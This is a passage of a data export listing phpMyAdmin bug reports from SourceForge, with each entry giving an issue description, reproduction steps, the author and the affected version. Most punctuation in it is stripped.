If you press enter in database filter or table filter the page reloads and the filter is reseted.
Original URL https sourceforge.net p phpmyadmin bugs 3970 Original author lord rod Found in version 4.0.3","bug"
"24444","10364","Ctrl shift click opens links in same window.
Phpmyadmin ignores ctrl shift mouseclick and opens links in the same window, but they must open in new window.
I suggest you to return true in onclick event handler if metakeys, such as ctrl, are pressed.
Original URL https sourceforge.net p phpmyadmin bugs 3971 Original author varyen3 Found in version 4.0.3","bug"
"24444","10365","javascript errors on login form.
After installing Debian 7 wheezy on a KVM server and adding webserver, php, mysql environment aptitude install php5 mysql mysql server), I extracted PMA 4.0.3 to the var www directory.
Without configuring anything, checking it in browser, only the PMA logo shows up, the login form is missing.
Firebug shows several JS errors, see attachment.
I repeated the procedure on a Virtualbox VM, result was the same.
Tried 4.0.2, 3.5.8.1, same result.
3.4.11 WORKS bundled with Debian wheezy)!
4.0.3 works on Debian squeeze, and with XAMPP on Windows.
Maybe it s related to the new apache php version in squeeze.
Original URL https sourceforge.net p phpmyadmin bugs 3972 Original author aboydude Found in version 4.0.3 Attachment http sourceforge.net p phpmyadmin bugs 3972 attachment pma bug.png","bug"
"24444","10366","Loading message PHPMyAdmin freezes.
When viewing SELECT output and clicking on the links Edit or Delete the message Loading is displayed and PHPMyAdmin hangs.
No actual loading seems to happen it just freezes.
Tested in Chrome and Internet Explorer 10.
Neither worked.
Problem already existed in 4.0.2.
Using MySQL 5.1.69 also PHP5 of course).
There are individual rows being listed, so there is no lack of a unique identifier.
Then there would be a notice.
Also, the quick links for altering a table don t work.
Same problem.
URL looks like PMAURL 3 sql.php?db=<database> table=<table> server=1 target= token=3f000f5cd60985f873d85e8053e53344 Original URL https sourceforge.net p phpmyadmin bugs 3973 Original author bamikanarie Found in version 4.0.3","bug"
"24444","10367","Can not edit an indexed field linked with foreign key.
Steps 1.
Create table A with primary key id.
2.
Create table B with indexed field `a id` and create foreign key to the A.id.
3.
Add some rows to the A and B tables.
4.
Go to the table B browse tab and try to edit value in the `a id` column.
Expected Value is edited.
Actually happen Can not edit value, nothing happens when you type anything.
Original URL https sourceforge.net p phpmyadmin bugs 3974 Original author speller1 Found in version 3.5.8","bug"
"24444","10368","Table grouping isn t implemented properly.
In 3.x versions you could click on table group to show tables, started with particular prefix tbl group).
In 4.x it s only possible to view grouped tables in navigation bar, but you can t get list of tables with prefix table group isn t clickable).
Original URL https sourceforge.net p phpmyadmin bugs 3975 Original author varyen3 Found in version 4.0.3","bug"
"24444","10369","Number of Pages.
Poor counts the number of pages in the table.
Sometimes it does not show the last page, even though they are.
Often shows more pages than it actually is.
for example http poiuty.ru img c221da3eca4c3ef2e0785056f1c3.png Original URL https sourceforge.net p phpmyadmin bugs 3976 Original author poiuty Found in version 4.0.3","bug"
"24444","10370","Not detected configuration storage.
phpMyAdmin tried to use pma recent table even it was not existing.
I would expect it to fail gracefully and allow me still to login.
I had phpMyAdmin configuration storage configured and the tables were missing I forgot to upgrade to new files with double underscore).
This has happened on demo server, so multi server setup.
Original URL https sourceforge.net p phpmyadmin bugs 3977 Original author nijel Found in version Latest Git","bug"
"24444","10371","CSV Import into an existing creates a Temp Table.
importing a CSV file into a table creates a temp table and imports the rows into the temp table.
The confirmation message says that the rows have been imported int the original table Steps Create a table mytable Go to the table Select Import Message displayed Importing into table mytable Choose a CSV file and hit Go Instead of importing data to mytable, a new table TABLE 176 is created and data is imported into that table Original URL https sourceforge.net p phpmyadmin bugs 3979 Original author naveensnayak Found in version 4.0.0","bug"
"24444","10372","Missing JSON support not correctly detected.
When running in PHP without JSON support, phpMyAdmin gives just blank page, it should however show some sensible error message.
Original URL https sourceforge.net p phpmyadmin bugs 3981 Original author nijel Found in version Latest Git","bug"
"24444","10373","ajax window duplicate page.
Sometimes this window http poiuty.ru img 4f04efaa0c2ef8c145b2dd891d7b.png pma gets completely duplicates the page on which I find.
Original URL https sourceforge.net p phpmyadmin bugs 3983 Original author poiuty Found in version 4.0.3","bug"
"24444","10374","Call to undefined function mb detect encoding.
encode is using mb detect encoding whithout checking if it exists.
Causes a white screen.
Original URL https sourceforge.net p phpmyadmin bugs 3985 Original author jariza ma Found in version 4.0.2","bug"
"24444","10375","Missing DROP VIEW button.
There is no button to drop a view.
Or I can t find it.
Original URL https sourceforge.net p phpmyadmin bugs 3986 Original author lord rod Found in version 4.0.4","bug"
"24444","10376","Rename view is not working.
Try to rename a view, the yellow popup comes up and hides an nothing changed.
Original URL https sourceforge.net p phpmyadmin bugs 3988 Original author lord rod Found in version 4.0.7","bug"
"24444","10377","Reloading privileges does not update the interface.
In the Users page, clicking on reload the privileges link does not update the UI with reloaded privileges.
Original URL https sourceforge.net p phpmyadmin bugs 3989 Original author madhuracj Found in version 4.0.0","bug"
"24444","10378","No option to avoid the CREATE DATABASE statement in exports.
It seems that since 4.0.2, all multi table SQL exports now include the CREATE DATABASE statement which isn t always desired.
I can find no way to prevent this statement from being included.
Sometimes I wish to export tables and import them into a different database and currently have to manually edit the export files every time.
Original URL https sourceforge.net p phpmyadmin bugs 3990 Original author simoneast Found in version 4.0.4","bug"
"24444","10379","Cannot define a column with fractional seconds.
MySQL >= 5.6.4 supports fractional seconds http dev.mysql.com doc relnotes mysql 5.6 en news 5 6 4.html) but the length value is dropped when trying to create or change this kind of columns.
Original URL https sourceforge.net p phpmyadmin bugs 4262 Original author lem9 Found in version 4.1.6","bug"
"24444","10380","Problem selecting item in select boxes with the ENTER keystroke in some browsers.
From version 4 it doesn t work to select appropriate value from any select box via ENTER keystroke.
When the ENTER is pressed e.g.
after arrow key in any select input field e.g.
box with the recent tables in right panel), nothing happens.
Selecting the current value is expected.
Tested in IE 10 and Opera 12.
Any normal html select input has possibility to choose appropriate value from all available values through keyboard arrow keys for up down movements between values and ENTER keystroke to select the current value.
It s standard behavior for any select box e.g.
in the current form for creating this bug report on sourceforge it works.
In PMA 4 it doesn t work.
In old 3.x it worked fine.
Original URL https sourceforge.net p phpmyadmin bugs 3991 Original author koubel Found in version 4.1.9","bug"
"24444","10381","Multi row edit doesn t clear values when checking NULL.
Issue When editing multiple rows and checking the NULL checkbox, the current value is not removed as it is when editing a single row).
This prevents the NULL value from being saved and the previous value remains.
Steps to reproduce 1.
Log in to phpMyADmin 2.
Select DB 3.
Select table 4.
Click browse 5.
Select multiple rows 6.
Click Change 7.
Check the NULL checkbox next to a nullable value with a current value set.
Notice that the current value is not removed.
8.
Click GO at the bottom of the screen 9.
Validate the value was not set to NULL Versions phpMyAdmin 4.0.3deb1.quantal ppa.2 server Ubuntu 12.10 PHP 5.4.6 1ubuntu1.2 MySQL 5.5.27 Browser Chrome 27.0.1453.116 Original URL https sourceforge.net p phpmyadmin bugs 3992 Original author itarchmerc Found in version 4.0.4","bug"
"24444","10382","Sorting in database overview with statistics doesn t work.
Open databases tab and enable statistics.
Click on the table header.
You get an error displaying No database selected , I expext the table to be sorted.
Original URL https sourceforge.net p phpmyadmin bugs 3993 Original author csware Found in version 4.0.4","bug"
"24444","10383","Missing datepicker icon for DATETIME length).
As tested in MySQL 5.6.15, a column with for example the type DATETIME 4) does not show the datepicker icon when editing.
Original URL https sourceforge.net p phpmyadmin bugs 4265 Original author lem9 Found in version 4.1.6","bug"
"24444","10384","Jquery cannot call methods on widget tooltip) prior to initialization.
Group of reports http reports.phpmyadmin.net reports view 260 and other similar instances.. cannot call methods on tooltip prior to initialization; attempted to call method destroy filename functions.js; line 1715; func PMA ajaxRemoveMessage; filename functions.js; line 1675; func PMA ajaxShowMessage; Original URL https sourceforge.net p phpmyadmin bugs 4266 Original author atul5 Found in version 4.1.6","bug"
"24444","10385","Advisor query cache limit check not working properly.
Phpmyadmin advisor always says The max size of the result set in the query cache is the default of 1 MiB This while my query cache limit is set to 10MiB according to the variables page of phpmyadmin Apparently this check does not work properly or maybe Original URL https sourceforge.net p phpmyadmin bugs 3994 Original author reaver56 Found in version 4.0.4","bug"
"24444","10386","Drizzle server charset notice.
When logging in to the demo Drizzle server, this notice is displayed at the bottom of the main page Notice in .
libraries mysql charsets.inc.php 45 Undefined index utf8 general ci Backtrace .
libraries sqlparser.lib.php 47 include once .
libraries mysql charsets.inc.php) .
libraries common.inc.php 1027 include once .
libraries sqlparser.lib.php) .
index.php 12 require once .
libraries common.inc.php) Original URL https sourceforge.net p phpmyadmin bugs 3995 Original author ibennetch Found in version 4.0.8","bug"
"24444","10387","Drizzle navigation doesn t expand.
When using a Drizzle server, the navigation button fails to expand.
I don t see any JavaScript errors reported by my browser.
Original URL https sourceforge.net p phpmyadmin bugs 3996 Original author ibennetch Found in version 4.0.7","bug"
"24444","10388","Call to undefined function PMA DBI num rows ).
PHP Fatal error Call to undefined function PMA DBI num rows ) in opt pma phpMyAdmin 4.0.4 english libraries navigation Nodes Node.class.php on line 408 I had PHP PDO installed, but no drivers.
After I installed pdo mysql, it works again.
Suggestion Show an error if PDO is not installed or if no database drivers for PDO are installed.
Original URL https sourceforge.net p phpmyadmin bugs 3997 Original author ci dev Found in version 4.0.4","bug"
"24444","10389","permanent SQL history not working.
I just noticed that since upgrading from v3.5) to 4.0.4, no SQL history had been recorded using the configuration storage settings.
It was working fine before.
So I logged out and checked logging in with the control setting but it said the details were wrong.
I logged in as root again and edited the user to set the password it has in the config which should have been working and I haven t changed it).
Then it would let me log in with the control user account, but now it has an error, Connection for controluser as defined in your configuration failed , even though it definitely works fine now!
Something strange is going on here... PHP 5.4.9 MySQL 5.5.31 phpMyAdmin 4.0.4 latest) Original URL https sourceforge.net p phpmyadmin bugs 3998 Original author svivian Found in version 4.0.4","bug"
"24444","10390","visually disappears functional pma.
Sometimes http poiuty.ru img 3431f1e54267133eb130a9454c05.png ctrl r does not help Original URL https sourceforge.net p phpmyadmin bugs 3999 Original author poiuty Found in version 4.0.4","bug"
"24444","10391","table does not contain unique column message appears after adding a unique column.
I got the above warning that the table I just created didn t have a unique column.
Which was correct.
So I selected all the fields and set as a primary key, but when I select specific fields from it, it still has that message.
I assume it s because the specific combination of fields is not unique, but the message is still wrong as it says the table .
Is the message even a better one) even necessary?
Seems strange to show a big warning just to explain why the edit buttons aren t there.
Original URL https sourceforge.net p phpmyadmin bugs 4000 Original author svivian Found in version 4.0.5","bug"
"24444","10392","improt error Class ImportOds not found.
Fatal error Class ImportOds not found in D \opt\www\phpmyadmin\libraries\plugin interface.lib.php on line 74 Original URL https sourceforge.net p phpmyadmin bugs 4001 Original author qhzhui Found in version 4.0.4 Attachment http sourceforge.net p phpmyadmin bugs 4001 attachment 12.jpg","bug"
"24444","10393","Edit Index on big table doesn t show Loading or any message.
when we edit index on a big table by using the Edit Index popup windows, when we press the go button nothing appear, we don t know if we press Go or not.
Original URL https sourceforge.net p phpmyadmin bugs 4002 Original author jfdionne Found in version 4.0.7 Attachment http sourceforge.net p phpmyadmin bugs 4002 attachment a.png","bug"
"24444","10394","Cannot insert more than 2 rows into table.
While inserting rows into the table, if the continue insertion with more rows is chosen, only two rows default) are insert and any other data row is not even considered.
Original URL https sourceforge.net p phpmyadmin bugs 4003 Original author shakirmole Found in version 4.0.4","bug"
"24444","10395","Interface icons mixed up in Google Chrome.
On OS X 10.8.4, with Google Chrome 27, the interface icons are mostly wrong.
See attachment for comparison with Firefox 22 and Safari 6.0.5.
System setup via homebrew) phpmyadmin 4.0.4 php v PHP 5.4.16 cli) built Jul 2 2013 12 50 05) Copyright c) 1997 2013 The PHP Group Zend Engine v2.4.0, Copyright c) 1998 2013 Zend Technologies with Xdebug v2.2.3, Copyright c) 2002 2013, by Derick Rethans mysql ?
mysql Ver 14.14 Distrib 5.6.12, for osx10.8 x86 64) using EditLine wrapper Copyright c) 2000, 2013, Oracle and or its affiliates.
All rights reserved.
Original URL https sourceforge.net p phpmyadmin bugs 4004 Original author davidgasperoni Found in version 4.0.4 Attachment http sourceforge.net p phpmyadmin bugs 4004 attachment screenshots.7z","bug"
"24444","10396","get scripts.js.php 25. http poiuty.ru img 95a416fd851f8d8d0737888b4ca2.png chrome console KeyboardEvent get scripts.js.php 25 KeyboardEvent get scripts.js.php 25 KeyboardEvent get scripts.js.php 25 Original URL https sourceforge.net p phpmyadmin bugs 4005 Original author poiuty Found in version 4.0.4","bug"
"24444","10397","Unable to log back in after session expired.
After I upgraded to the latest version of phpMyAdmin 4.0.4.1), whenever I try to log back in after my session expired, I end up getting this message > phpMyAdmin Error > > Incorrect format parameter If it is helpful, my web server is running nginx 1.3.10, php 5.4.10 and mysql 5.5.29.
Any help would be greatly appreciated.
Original URL https sourceforge.net p phpmyadmin bugs 4008 Original author omega13a Found in version 4.1.6","bug"
"24444","10398","Statistic Monitor shows only last 3 digits in graph.
The Monitoring graph shows only 3 characters orange marker) and the tooltip is hidden on the left side red marker).
See attachment.
Original URL https sourceforge.net p phpmyadmin bugs 4009 Original author lord rod Found in version 4.0.4 Attachment http sourceforge.net p phpmyadmin bugs 4009 attachment statistic.jpg","bug"
"24444","10399","indexes are combined when using edit table popup.
When adding new columns fields to a table with the edit table popup, and selecting the INDEX option for some of them at least two), a combined index is created.
I would expect separate one per column field) indexes to be created.
If someone would like to have indexes spanning different columns, they can use the index editor, I assume using multicolumn field indexes is more advanced than single column field indexes.
What s currently happening ALTER TABLE `table` ADD `field1` VARCHAR 8 ) NOT NULL, ADD `field2` CHAR 2 ) NOT NULL, ADD INDEX `field1` , `field2` ) ; What should happen by default ALTER TABLE `table` ADD `field1` VARCHAR 8 ) NOT NULL, ADD `field2` CHAR 2 ) NOT NULL, ADD INDEX `field1` ), ADD INDEX `field2` ) ; Original URL https sourceforge.net p phpmyadmin bugs 4011 Original author ruleant Found in version 4.0.4","bug"
"24444","10400","Crash on CSV file import.
PhpMyAdmin crashs on attempts to import long CSV file.
e.g.
when I ve tried to import about 400K lines, about 10MiB CSV it crashes with the message [Fri Jul 05 12 44 56 2013] [error] [client 127.0.0.1] PHP Fatal error Allowed memory size of 1073741824 bytes exhausted tried to allocate 40961 bytes) in Users dime Sites mysql4 libraries import.lib.php on line 863, referer http import.php As you can see memory limit is 1GiB that should be more than enough to import 10MiB file.
The problem is caused by wrong usage referencing for parameters.
Once it fixed bash 3.2 diff ubp import.lib.php.orig import.lib.php.patched import.lib.php.orig 2013 07 09 15 16 46.000000000 0300 import.lib.php.patched 2013 07 09 15 18 05.000000000 0300 565,7 565,7 function PMA getDecimalSize cell) todo Handle the error cases more elegantly function PMA detectSize last cumulative size, last cumulative type, curr type, cell curr type, cell ) { curr size = strlen string) cell); 763,7 763,7 function PMA detectSize last cumulative VARCHAR or INT or BIGINT or DECIMAL or NONE) access public function PMA detectType last cumulative type, cell) function PMA detectType last cumulative type, cell) { If numeric, determine if decimal, int or bigint bash 3.2 It obviously works just fine.
Could you please commit the patch.
PS just in order to prevent flame passing parameters by value without reference does not initiate a data coping, meanwhile modification of part of the array passed by reference does.
Original URL https sourceforge.net p phpmyadmin bugs 4012 Original author dmitriybuldakov Found in version 4.0.4","bug"
"24444","10401","PMA Setup UI bugs.
I found several bugs with phpmyadmin setup ui host phpmyadmin setup).
1.
The content of setup pages is displayed to the right of the right edge of its tabs if the sum of widths of tabs and content is less than the browser width tested with opera)<br><br> 2.
Tabs positions change when the browser is resized and the positions change further when clicking on the tabs at the right edge tested with firefox, opera).<br><br> 3.
Tabs and content appear separately.
There is some space between tabs and the contents tested with chrome, firefox, opera).
Original URL https sourceforge.net p phpmyadmin bugs 4285 Original author plbsam Found in version 4.1.7 Attachment http sourceforge.net p phpmyadmin bugs 4285 attachment Screenshot 20from 202014 02 14 2003 3A21 3A45.png Attachment http sourceforge.net p phpmyadmin bugs 4285 attachment Screenshot 20from 202014 02 14 2003 3A24 3A51.png Attachment http sourceforge.net p phpmyadmin bugs 4285 attachment Screenshot 20from 202014 02 14 2004 3A05 3A37.png","bug"
"24444","10402","AJAX request waiting until version info is retrieved.
After opening the homepage fe.
after a login to phpMyAdmin), an AJAX request, fe.
clicking in the navigation tree to expand a database, is not executed until the current version is retrieved.
If getting the current version data takes some time, the AJAX request is seriously delayed.
After the current version information is added, or retrieving it has timed out, all AJAX requests run smoothly from them on.
Original URL https sourceforge.net p phpmyadmin bugs 4013 Original author ruleant Found in version Latest Git","bug"
"24444","10403","Large queries break the interface.
MySQL Server Localhost via UNIX socket Server version 5.5.31 0ubuntu0.12.04.1 Protocol version 10 MySQL charset UTF 8 Unicode utf8) Web server Apache 2.2.22 Ubuntu) MySQL client version 5.5.31 PHP extension mysqli phpMyAdmin Version information 3.4.10.1deb1 After executing a large query for example, 960 characters long, with two LEFT JOINs), the page refreshes and displays the executed query atop the page.
The interface below the query breaks, specifically, some HTML anchors have turned into buttons and no longer work.
Sometimes the Inline edit anchor looks normal but also ceases to work.
In the attached image, I ve circled the query editing anchors buttons, but this phenomenon also affects the column sorting anchors.
Content and quantity of results is irrelevant.
Original URL https sourceforge.net p phpmyadmin bugs 4014 Original author jianhouzi Found in version 3.4.10 Attachment http sourceforge.net p phpmyadmin bugs 4014 attachment phpmyadmin error.png","bug"
"24444","10404","Unhex on utf 8 special digit.
Hello, I m on version 4.0.4.1 Safari 6.0.5 I try to run this following query SELECT UNHEX E2AB99 ); Area A in screenshot ) PhpMyAdmin return the same string without any transformation Area B ) I do the same in MySQL using terminal connexion Area C ).
Output is alright.
Further details in following screenshot.
Seems to be a bug Regards, Original URL https sourceforge.net p phpmyadmin bugs 4016 Original author chezbas Found in version 4.0.4 Attachment http sourceforge.net p phpmyadmin bugs 4016 attachment unhex issue.png","bug"
"24444","10405","Undefined index in tbl views.lib.php.
I m seeing seeing a notice when creating a new view.
Notice in .
libraries tbl views.lib.php 76 Undefined index column info Backtrace .
view create.php 76 PMA getExistingTransformationData string test sakila ) To reproduce, create a new view I m using a copy of the sakila database and my view is select from actor ).
Once the view is created, immediately browse it by clicking the newly created view in the navigation pane).
As far as I can tell, that s the only way to see it browsing the view again or visiting a different page in between creating and viewing does not display the message.
This exists since at least 4.0.0 Original URL https sourceforge.net p phpmyadmin bugs 4017 Original author ibennetch Found in version Latest Git","bug"
"24444","10406","use foo changes database but not table.
When in one database and table then using the SQL tab to use another database, phpMyAdmin correctly changes databases, but still tries to load the old table.
For instance, if you have the standard sakila test database and database foo with tables bar and baz, going to sakila.actor then entering use foo brings up the page attempting to display foo.actor, which doesn t exist.
It should instead just switch to foo and ignore the table.
Original URL https sourceforge.net p phpmyadmin bugs 4018 Original author ibennetch Found in version Latest Git","bug"
"24444","10407","Create database if not exists export).
After upgrading from phpMyAdmin 3.5.8.1 to 4.0.4.1, there is a difference in the .sql file created when doing Export that causes trouble for us offering shared hosting.
In phpMyAdmin 4.0.4.1 the following is added in the .sql file after doing Export I have replaced database user and name with user name ) CREATE DATABASE IF NOT EXISTS `user name` DEFAULT CHARACTER SET latin1 COLLATE latin1 swedish ci; USE `user name`; The above two lines was not added to the .sql file when doing Export in phpMyAdmin 3.5.8.1, only when upgrading to 4.0.4.1, those lines are added in the .sql file.
Please note that we offer shared hosting, and the customers create databases in a different control panel, not in phpMyAdmin itself.
The customers can have several databases under same database user.
When the customer to a Export in phpMyAdmin of a existing database, and then create a new database, and then use Import in phpMyAdmin to import the .sql file into the new database, they get a error because of those lines and phpMyAdmin is trying to create a new database or if the database still exist, phpMyAdmin try to import it to the old database, wich is wrong because the customer is trying to import it to a new database.
Then we get support tickets, and must explain to the customer that they first need to manually edit the .sql file and remove these lines CREATE DATABASE IF NOT EXISTS `user name` DEFAULT CHARACTER SET latin1 COLLATE latin1 swedish ci; USE `user name`; Then after removing those, they can do a import to the new database the have created.
I don t know if it was intentionally that you added those two lines in phpMyAdmin 4.0.x or not, but it causes trouble for our customers.
Also I do not see what the benefit of having those lines in the .sql file would be.
So please please don t add those two lines when doing export?
I hope you can change this in future version?
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 4019 Original author aommundsen Found in version 4.0.4","bug"
"24444","10408","copying a database with an auto increment col that has a value 0.
If you have a table `test` with a row that has a 0 in an auto increment field, it is not possible to copy that table into a new table `test2` INSERT INTO `test`.`test2` SELECT FROM `test`.`test` MySQL said Documentation 1062 Duplicate entry 1 for key PRIMARY But that could be avoided by a fix, that would first inserting the data without the auto increment option and then later marking it as an auto increment field.
INSERT INTO `test`.`test2` `uid`) VALUES 1 ); UPDATE `test`.`test2` SET `uid` = 0 WHERE `test2`.`uid` =1; see also http stackoverflow.com questions 2288712 can i use zero in a column which has the auto increment attribute Original URL https sourceforge.net p phpmyadmin bugs 4020 Original author rubo77 Found in version 3.3.7","bug"
"24444","10409","Previous Insert Query runs after editing it.
After running some queries through the SQL tab, the query is executed successfully and shows the messages 1 rows affected).
However editing the box without refreshing) runs the previous query and not the edited query.
Example 1.)
Run insert into tests VALUES 10,1,1); Shows insert into tests VALUES 10,1,1); 1 row affected.
2.)
Edit textarea to insert into tests VALUES 11,1,1); Shows reports that duplicate value for id because it ran the original query insert into tests VALUES 10,1,1); Check as I might be mistaken.
Original URL https sourceforge.net p phpmyadmin bugs 4021 Original author shakirmole Found in version 4.0.4","bug"
"24444","10410","Events and Trigger menu items don t show up.
Related to 3566, there is a problem with the Events and Trigger menu items on older MySQL servers.
The method currentUserHasPrivilege ) checks the privilege for TRIGGER and EVENT with a given database in my case ni154268 3 ch .
This replacements db = str replace array , ), array \ , ), db); ... self sqlAddSlashes db) will result in this string ni154268\ 3\ ch .
On MySQL 5.5x this is fine, but on MySQL 5.1.69, this does not work.
If I remove the slashes and submit the resulting query, all works fine.
So I think this is a compatibility issue with an old MySQL server version and can be fixed in currentUserHasPrivilege ).
Original URL https sourceforge.net p phpmyadmin bugs 4022 Original author fu86 Found in version 3.3.7","bug"
"24444","10411","Requires wildcard EXECUTE ALTER ROUTINE on DB to allow Procedures to be executed by user.
Ubuntu 12.04 MySQL 5.5.31 0ubuntu0.12.04.2 phpMyAdmin 4.0.3 1.precise ppa.2 from ppa nijel phpmyadmin repo) I also just did an upgrade of phpMyAdmin from 3.4.10.1 1 last version in official Ubuntu 12.04 repos).
Have seen no real issues after upgrade, just wanted to play with the new Procedure Routine stuff and found this quirk.
The phpmyadmin UI will not allow another user to execute edit a procedure unless they have wildcard EXECUTE, ALTER ROUTINE access to the entire DB.
Giving the user explicit EXECUTE, ALTER ROUTINE for the procedure name itself will not work, even though the user can manually call the routine from the SQL execute area.
Quick example, running the following commands as root >CREATE DATABASE testproc; use testproc; DELIMITER CREATE PROCEDURE test ) BEGIN SELECT 1; END DELIMITER ; CREATE USER procuser localhost IDENTIFIED BY test ; GRANT SELECT ON testproc.
TO procuser localhost ; GRANT EXECUTE, ALTER ROUTINE ON PROCEDURE testproc.test TO procuser localhost ; Obviously just creates a db, procedure, a user, and gives the user access to procedure.
Logging in via phpmyadmin with this user they will be able to see the routine, but cannot execute or edit it through the UI.
They can manually run the sql command `call test );` with no problems.
If you give the user wildcard EXECUTE and ALTER ROUTINE on the database, plus SELECT access to mysql.proc for some reason, phpmyadmin will allow the user to execute and edit the routine in the UI.
>GRANT SELECT ON mysql.proc TO procuser localhost ; GRANT EXECUTE, ALTER ROUTINE ON testproc.
TO procuser localhost ; I m not sure why the first access would be necessary, as I would imagine if phpmyadmin needs access to anything it would be mysql.procs priv.
But clearly the second seems to be a pretty large limitation.
Is this intended behavior?
Original URL https sourceforge.net p phpmyadmin bugs 4023 Original author nicholi Found in version 4.1.0","bug"
"24444","10412","gzip export is not actually compressed with mod deflate.
See https sourceforge.net p phpmyadmin discussion Help thread 0dab8571 c37b, originally reported by user candev.
When attempting to create an export compressed with gzip, and the Apache server is running mod deflate, the resulting file is not actually compressed regardless of whether it s saved on the server or downloaded).
This only happens when Apache is running with mod deflate; if mod deflate is disabled the gzip works correctly.
This only happens with gzip compression.
Original URL https sourceforge.net p phpmyadmin bugs 4025 Original author ibennetch Found in version Latest Git","bug"
"24444","10413","comment gone missing, a bug?.
a comment to one of my columns in a table suddenly disappeared, i logged in today and they were gone the rest of the table seems ok its seems just the comment has gone missing Original URL https sourceforge.net p phpmyadmin bugs 4028 Original author rafhelp Found in version 4.0.4","bug"
"24444","10414","Left navigation looses state on page reload.
Reloading the page closes whatever is expanded in the left navigation frame.
This is likely to be expected due to how it is implemented and was the same with the old navigation if I remember correctly).
However, if you leave the browser in whatever stated far down on an hierarchy, and get the token mismatch error , the user will have to reload the page, and then try to backtrack to get back to where they was.
It might be related to the problem described in 4010 Original URL https sourceforge.net p phpmyadmin bugs 4029 Original author ekitomat Found in version Latest Git","bug"
"24444","10415","Can not edit table.
I am getting error messages This table does not contain a unique column.
Grid edit, checkbox,Edit, Copy and Delete features are not available.
Also other error messages unknown table status TABLE TYPE and unknown table status Create time These messages are shown for example for all tables in information schema Running on Mysql 5.1.66 php 5.33 Debian 6.0.7 Original URL https sourceforge.net p phpmyadmin bugs 4032 Original author arie1 Found in version 4.0.4","bug"
"24444","10416","Test ticket for error reporting system.
Original URL https sourceforge.net p phpmyadmin bugs 4033 Original author mohamed ashraf Found in version 3.3.7","bug"
"24444","10417","get scripts.js.php not working correctly.
I installed phpMyAdmin 4.1.8 english.zip on a Debian Wheezy latest stable, x86 64 architecture) inside a VirtualBox.
On a LAMP stack, when i access login page, get scripts.js.php returns an invalid content catched by web console).
Inside web console all content seems ok, but inside browser it s not.
This does not make anything appear in login page.
I attach source of get scripts.js.php and phpinfo ).
Original URL https sourceforge.net p phpmyadmin bugs 4296 Original author mbcraft Found in version 4.1.8 Attachment http sourceforge.net p phpmyadmin bugs 4296 attachment phpinfo result.html","bug"
"24444","10418","Query inline link disappears when turning off Explain SQL option.
Go to Settings > SQL queries > SQL Query box tab.
Untick Explain SQL option.
Go to a table or run a query.
The Inline link is not there any more, it just has Edit and Refresh.
Original URL https sourceforge.net p phpmyadmin bugs 4035 Original author svivian Found in version 4.0.4","bug"
"24444","10419","Call to undefined function mb detect encoding.
encode is using mb detect encoding whithout checking if it exists.
Causes a white screen.
Tested in 4.0.4.2.
Original URL https sourceforge.net p phpmyadmin bugs 4036 Original author jariza ma Found in version 4.0.4","bug"
"24444","10420","Icon packs not working in Firefox.
I installed the new 4.0.4.2 release and the icon packs do not work correctly in firefox.
All the icons are displayed incorrectly.
This is obvious after logging into a server and viewing the home screen .
I have a screen capture, but am unable to attach it with the SourceForge Add attachments button for some reason.
This is occuring on Firefox 21 on Windows 7.
Everything functions flawlessly on Internet Explorer.
Original URL https sourceforge.net p phpmyadmin bugs 4037 Original author gabeguillen Found in version 4.0.4","bug"
"24444","10421","PMASA 2013 8 not mentioned in 4.0.4.2 ChangeLog.
4.0.4.2 contains fix unescaped parameter, see PMASA 2013 8 for details https github.com phpmyadmin phpmyadmin commit 56e9ede5223219cef2187ced385924ef2e0ae21d but this is not mentioned in the 4.0.4.2 section of the ChangeLog file https github.com phpmyadmin phpmyadmin blob master ChangeLog Original URL https sourceforge.net p phpmyadmin bugs 4038 Original author julianladisch Found in version Latest Git","bug"
"24444","10422","Cannot browse past the first page of a view.
See https sourceforge.net p phpmyadmin discussion Help thread 6c6dfcee Original URL https sourceforge.net p phpmyadmin bugs 4039 Original author lem9 Found in version 4.0.4","bug"
"24444","10423","Grid edit textfield can t place cursor or select text with mouse.
1.
Double click a text cell in browse mode a text input appears try to place the cursor by clicking somwhere within the text the input field disappears tested on demo server in latest git Original URL https sourceforge.net p phpmyadmin bugs 4300 Original author rm km it Found in version Latest Git","bug"
"24444","10424","Grid edit SELECT query is replaced by UPDATE query after edit.
1.
Double click a cell in browse mode edit the value when the value is updated, the update query replaces the previous select query in the upper SQL box Problem I see is, besides you can t what the query was that yields the table you see, you can t use the refresh function that belongs to the select query Expected behaviour When you use the dedicated edit dialog, after the update you see two SQL boxes, one with the select and one withe the update Original URL https sourceforge.net p phpmyadmin bugs 4301 Original author rm km it Found in version 4.1.9","bug"
"24444","10425","Fatal error while resetting settings.
When a user tries to reset their settings, a PHP error message is shown instead.
Steps to reproduce config auth) 1.
In the server view, click the Settings tab.
In the Reset box, click the Reset button.
Expected Green check message Configuration has been loaded.
Actual PHP Fatal error Call to a member function getPath ) on a non object in libraries Util.class.php on line 183 The problematic line is .
6e12d1a0881434d9e067907c979f7749d1a73c37 is the first bad commit commit 6e12d1a0881434d9e067907c979f7749d1a73c37 Author Rouslan Placella <rouslan placella.com> Date Tue Jun 5 15 36 38 2012 0100 Ensure that PMA Response is instanciated in common.inc.php 040000 040000 f70973063a89be38e70839afc79890bb7d9e84f7 a90bccadfaf8f9d794f741fdece19eb06d519e5c M libraries Original URL https sourceforge.net p phpmyadmin bugs 4040 Original author mynetx Found in version 4.1.8","bug"
"24444","10426","Interaction between linkified fields and grid editing.
In 4.0.4.2 and a few versions before this) there are wierd things happening with linked fields and grid editing, at least on Mac Chrome 29.0.1547.22 beta also briefly tested on Mac FF 22).
set Grid editing trigger to double click browse a table for which relations have been configured Issues when single clicking on a field that has been linkified to search the destination table), the expected behavior would be for the browser to load the table linked to after a brief wait for a possible second click) the actual behavior is that nothing happens when clicking a second time on the same field after the double click period has expired, the expected behavior would be the same as a single click the actual behavior is that regardless of how long has elapsed between consecutive clicks on the field, a double click is registered and the grid editing overlay is shown clicking the Go to link link in the editing overlay opens the destination URL in a new tab the expected behavior is that the destination URL is loaded in the same tab closing the editing overlay restores expected single click behavior single clicking the same field again without first clicking on another link) does load the destination table Original URL https sourceforge.net p phpmyadmin bugs 4041 Original author paour1 Found in version 4.0.4","bug"
"24444","10427","Cannot delete after Check all Loading...).
I have noticed in 4.0.4.2 that when I am viewing a table and I click Check All to select all records, then click Delete , then click Yes to confirm, I get stuck at that screen with a modal Loading message.
Sometimes the delete query succeeds, sometimes it does not.
I have waited several minutes to see what happens and the process never advances.
This only occurs when clicking Check All .
It does NOT occur when I check a single record then click Delete or when I check all entries manually and click Delete .
